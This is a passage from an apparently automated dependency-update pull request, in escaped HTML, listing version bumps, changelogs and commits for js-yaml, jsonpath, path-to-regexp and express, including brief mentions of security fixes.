href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsonpath` from 1.1.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/dchester/jsonpath/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 6.2.1 to 6.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd funding field (v4) by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6065\"\u003eexpressjs/express#6065\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11 by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5956\"\u003eexpressjs/express#5956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: bump path-to-regexp@0.1.12 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6209\"\u003eexpressjs/express#6209\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.2 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6094\"\u003eexpressjs/express#6094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.1...4.21.2\"\u003ehttps://github.com/expressjs/express/compare/4.21.1...4.21.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport a fix for CVE-2024-47764 to the 4.x branch by \u003ca href=\"https://github.com/joshbuker\"\u003e\u003ccode\u003e@​joshbuker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6029\"\u003eexpressjs/express#6029\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6031\"\u003eexpressjs/express#6031\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.0...4.21.1\"\u003ehttps://github.com/expressjs/express/compare/4.21.0...4.21.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.1/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRemove link renderization in html while using \u003ccode\u003eres.redirect\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.10\n\u003cul\u003e\n\u003cli\u003eAdds support for named matching groups in the routes using a regex\u003c/li\u003e\n\u003cli\u003eAdds backtracking protection to parameters without regexes defined\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: encodeurl@~2.0.0\n\u003cul\u003e\n\u003cli\u003eRemoves encoding of \u003ccode\u003e\\\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, and \u003ccode\u003e^\u003c/code\u003e to align better with URL spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eDeprecate passing \u003ccode\u003eoptions.maxAge\u003c/code\u003e and \u003ccode\u003eoptions.expires\u003c/code\u003e to \u003ccode\u003eres.clearCookie\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6a23d34d652b9e69a4486d2a2a0dea54b9685fa5\"\u003e\u003ccode\u003e6a23d34\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6919\"\u003e#6919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8c12cdf93b89a4628b59179e3cc0722fc517d6b3\"\u003e\u003ccode\u003e8c12cdf\u003c/code\u003e\u003c/a\u003e deps: qs@6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6909\"\u003e#6909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 